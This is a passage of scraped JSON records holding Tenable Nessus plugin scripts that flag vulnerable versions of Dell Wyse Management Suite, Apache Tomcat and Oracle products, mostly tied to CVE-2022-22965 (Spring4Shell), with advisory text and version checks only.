"https://www.tenable.com/plugins/nessus/161952", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161952);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2022-0778\", \"CVE-2022-22965\");\n script_xref(name:\"IAVA\", value:\"2022-A-0121-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n\n script_name(english:\"Dell Wyse Management Suite < 3.6.1 Multiple Vulnerabilities (DSA-2022-098)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Dell Wyse Management Suite installed on the local host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Dell Wyse Management Suite installed on the remote host is prior to tested version. 
It is, therefore,\naffected by multiple vulnerabilities as referenced in the DSA-2022-098 advisory.\n\n - The BN_mod_sqrt() function, which computes a modular square root, contains a bug that can cause it to loop\n forever for non-prime moduli. Internally this function is used when parsing certificates that contain\n elliptic curve public keys in compressed form or explicit elliptic curve parameters with a base point\n encoded in compressed form. It is possible to trigger the infinite loop by crafting a certificate that has\n invalid explicit curve parameters. Since certificate parsing happens prior to verification of the\n certificate signature, any process that parses an externally supplied certificate may thus be subject to a\n denial of service attack. The infinite loop can also be reached when parsing crafted private keys as they\n can contain explicit elliptic curve parameters. Thus vulnerable situations include: - TLS clients\n consuming server certificates - TLS servers consuming client certificates - Hosting providers taking\n certificates or private keys from customers - Certificate authorities parsing certification requests from\n subscribers - Anything else which parses ASN.1 elliptic curve parameters Also any other applications that\n use the BN_mod_sqrt() where the attacker can control the parameter values are vulnerable to this DoS\n issue. In the OpenSSL 1.0.2 version the public key is not parsed during initial parsing of the certificate\n which makes it slightly harder to trigger the infinite loop. However any operation which requires the\n public key from the certificate will trigger the infinite loop. In particular the attacker can use a self-\n signed certificate to trigger the loop during verification of the certificate signature. This issue\n affects OpenSSL versions 1.0.2, 1.1.1 and 3.0. It was addressed in the releases of 1.1.1n and 3.0.2 on the\n 15th March 2022. Fixed in OpenSSL 3.0.2 (Affected 3.0.0,3.0.1). 
Fixed in OpenSSL 1.1.1n (Affected\n 1.1.1-1.1.1m). Fixed in OpenSSL 1.0.2zd (Affected 1.0.2-1.0.2zc). (CVE-2022-0778)\n\n - A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution\n (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR\n deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not\n vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be\n other ways to exploit it. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.dell.com/support/kbdoc/en-us/000198486/dsa-2022-098-dell-wyse-management-suite-security-update-for-multiple-vulnerabilities\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?beac8880\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Dell Wyse Management Suite 3.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/06/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:dell:wyse_management_suite\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"dell_wyse_management_suite_win_installed.nbin\");\n script_require_keys(\"installed_sw/Dell Wyse Management Suite\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\n\nvar app_info = vcf::get_app_info(app:'Dell Wyse Management Suite', win_local:TRUE);\n\nvar constraints = [\n { 'fixed_version' : '3.6.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-01T15:13:27", "description": "The version of Apache Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. 
(CVE-2021-43980)", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 10.0.0.M1 < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-43980", "CVE-2022-22965"], "modified": "2023-12-01T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_10_0_20.NASL", "href": "https://www.tenable.com/plugins/nessus/159463", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159463);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/12/01\");\n\n script_cve_id(\"CVE-2021-43980\");\n script_xref(name:\"IAVA\", value:\"2023-A-0534-S\");\n\n script_name(english:\"Apache Tomcat 10.0.0.M1 < 10.0.20 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 10.x prior to 10.0.20.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to\n Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache\n Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause\n client connections to share an Http11Processor instance resulting in responses, or part responses, to be\n received by the wrong client. 
(CVE-2021-43980)\");\n # https://github.com/apache/tomcat/commit/17f177eeb7df5938f67ef9ea580411b120195f13\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d6ecd284\");\n # https://tomcat.apache.org/security-10.html#Fixed_in_Apache_Tomcat_10.0.20\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?953e1d4d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 10.0.20 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43980\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed: '10.0.20', min:'10.0.0.M1', severity:SECURITY_NOTE, granularity_regex: \"^10(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-03T17:27:27", "description": "The 5.9.0.0.0 and All Supported Versions versions of Oracle Business Intelligence Enterprise Edition (OAS) installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Service Administration UI (JQuery)). The supported version that is affected is 5.9.0.0.0.\n Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data. (CVE-2020-11023)\n\n - Security-in-Depth issue in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Service API (Spring Framework)). 
This vulnerability cannot be exploited in the context of this product.\n (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-08-17T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Publisher (OAS) (Jul 2022 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-11023", "CVE-2022-22965"], "modified": "2023-01-18T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:business_intelligence_publisher"], "id": "ORACLE_BI_PUBLISHER_OAS_CPU_JUL_2022.NASL", "href": "https://www.tenable.com/plugins/nessus/164159", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164159);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/18\");\n\n script_cve_id(\"CVE-2020-11023\", \"CVE-2022-22965\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Business Intelligence Publisher (OAS) (Jul 2022 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The 5.9.0.0.0 and All Supported Versions versions of Oracle Business Intelligence Enterprise Edition (OAS) installed\non the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware\n (component: Service Administration UI (JQuery)). The supported version that is affected is 5.9.0.0.0.\n Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to\n compromise Oracle Business Intelligence Enterprise Edition. 
Successful attacks require human interaction\n from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence\n Enterprise Edition, attacks may significantly impact additional products (scope change). Successful\n attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle\n Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset\n of Oracle Business Intelligence Enterprise Edition accessible data. (CVE-2020-11023)\n\n - Security-in-Depth issue in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Web Service\n API (Spring Framework)). This vulnerability cannot be exploited in the context of this product.\n (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpujul2022cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2022.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2022 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n 
script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence_publisher\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_bi_publisher_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Publisher\");\n\n exit(0);\n}\n\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::get_app_info(app:'Oracle Business Intelligence Publisher');\n\nvar constraints = [\n # Oracle Analytics Server 5.9\n {'min_version': '12.2.5.9', 'fixed_version': '12.2.5.9.220714', 'patch': '34385848', 'bundle': '34385848'}\n];\n\nvcf::oracle_bi_publisher::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-01T15:12:04", "description": "The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. 
(CVE-2021-43980)", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-43980", "CVE-2022-22965"], "modified": "2023-12-01T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_8_5_78.NASL", "href": "https://www.tenable.com/plugins/nessus/159462", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159462);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/12/01\");\n\n script_cve_id(\"CVE-2021-43980\");\n script_xref(name:\"IAVA\", value:\"2023-A-0534-S\");\n\n script_name(english:\"Apache Tomcat 8.x < 8.5.78 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 8.x prior to 8.5.78.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to\n Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache\n Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause\n client connections to share an Http11Processor instance resulting in responses, or part responses, to be\n received by the wrong client. 
(CVE-2021-43980)\");\n # https://github.com/apache/tomcat/commit/4a00b0c0890538b9d3107eef8f2e0afadd119beb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c41b6749\");\n # https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.78\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?72f4365d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 8.5.78 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43980\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed:'8.5.78', min:'8.0.0', severity:SECURITY_NOTE, granularity_regex: \"^8(\\.[012345])?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-01T15:14:31", "description": "The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause client connections to share an Http11Processor instance resulting in responses, or part responses, to be received by the wrong client. 
(CVE-2021-43980)", "cvss3": {}, "published": "2022-04-01T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.0.M1 < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-43980", "CVE-2022-22965"], "modified": "2023-12-01T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_62.NASL", "href": "https://www.tenable.com/plugins/nessus/159464", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159464);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/12/01\");\n\n script_cve_id(\"CVE-2021-43980\");\n script_xref(name:\"IAVA\", value:\"2023-A-0534-S\");\n\n script_name(english:\"Apache Tomcat 9.0.0.M1 < 9.0.62 Spring4Shell (CVE-2022-22965) Mitigations\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apache Tomcat server is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Tomcat installed on the remote host is 9.x prior to 9.0.62.\n\n - The simplified implementation of blocking reads and writes introduced in Tomcat 10 and back-ported to\n Tomcat 9.0.47 onwards exposed a long standing (but extremely hard to trigger) concurrency bug in Apache\n Tomcat 10.1.0 to 10.1.0-M12, 10.0.0-M1 to 10.0.18, 9.0.0-M1 to 9.0.60 and 8.5.0 to 8.5.77 that could cause\n client connections to share an Http11Processor instance resulting in responses, or part responses, to be\n received by the wrong client. 
(CVE-2021-43980)\");\n # https://github.com/apache/tomcat/commit/170e0f792bd18ff031677890ba2fe50eb7a376c1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f8a02181\");\n # https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.62\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a9b73a07\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.62 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-43980\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:tomcat\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"former\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"tomcat_error_version.nasl\", \"tomcat_win_installed.nbin\", \"apache_tomcat_nix_installed.nbin\");\n script_require_keys(\"installed_sw/Apache Tomcat\");\n\n exit(0);\n}\n\ninclude('tomcat_version.inc');\n\ntomcat_check_version(fixed: '9.0.62', min:'9.0.0.M1', severity:SECURITY_NOTE, granularity_regex: \"^9(\\.0)?$\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:00:27", "description": "The versions of Primavera Gateway installed on the remote host are affected by multiple vulnerabilities as referenced in the July 2022 CPU advisory.\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (jackson-databind)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14, 19.12.0-19.12.13, 20.12.0-20.12.8 and 21.12.0-21.12.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera Gateway. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Primavera Gateway. (CVE-2020-36518)\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (Apache Xerces-J)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14, 19.12.0-19.12.13 and 20.12.0-20.12.8. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Primavera Gateway. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Primavera Gateway.\n (CVE-2022-23437)\n\n - Security-in-Depth issue in the Primavera Gateway product of Oracle Construction and Engineering (component: Admin (Spring Framework)). 
This vulnerability cannot be exploited in the context of this product. (CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-21T00:00:00", "type": "nessus", "title": "Oracle Primavera Gateway (Jul 2022 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-36518", "CVE-2022-22965", "CVE-2022-23437"], "modified": "2023-10-24T00:00:00", "cpe": ["cpe:/a:oracle:primavera_gateway"], "id": "ORACLE_PRIMAVERA_GATEWAY_CPU_JUL_2022.NASL", "href": "https://www.tenable.com/plugins/nessus/163328", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163328);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/24\");\n\n script_cve_id(\"CVE-2020-36518\", \"CVE-2022-22965\", \"CVE-2022-23437\");\n script_xref(name:\"IAVA\", value:\"2022-A-0285\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/25\");\n script_xref(name:\"IAVA\", value:\"2023-A-0558\");\n\n script_name(english:\"Oracle Primavera Gateway (Jul 2022 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The versions of Primavera Gateway installed on the remote host are affected by multiple vulnerabilities as referenced in\nthe July 2022 CPU advisory.\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (jackson-databind)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14,\n 19.12.0-19.12.13, 20.12.0-20.12.8 and 21.12.0-21.12.1. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via HTTP to compromise Primavera Gateway. 
Successful attacks\n of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash\n (complete DOS) of Primavera Gateway. (CVE-2020-36518)\n\n - Vulnerability in the Primavera Gateway product of Oracle Construction and Engineering (component:\n Admin (Apache Xerces-J)). Supported versions that are affected are 17.12.0-17.12.11, 18.8.0-18.8.14,\n 19.12.0-19.12.13 and 20.12.0-20.12.8. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via HTTP to compromise Primavera Gateway. Successful attacks require human interaction\n from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized\n ability to cause a hang or frequently repeatable crash (complete DOS) of Primavera Gateway.\n (CVE-2022-23437)\n\n - Security-in-Depth issue in the Primavera Gateway product of Oracle Construction and Engineering\n (component: Admin (Spring Framework)). This vulnerability cannot be exploited in the context of this\n product. 
(CVE-2022-22965)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/docs/tech/security-alerts/cpujul2022cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2022.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2022 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Spring Framework Class property RCE (Spring4Shell)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/07/19\");\n script_set_attribute(attribute:\"patch_publication_date\", 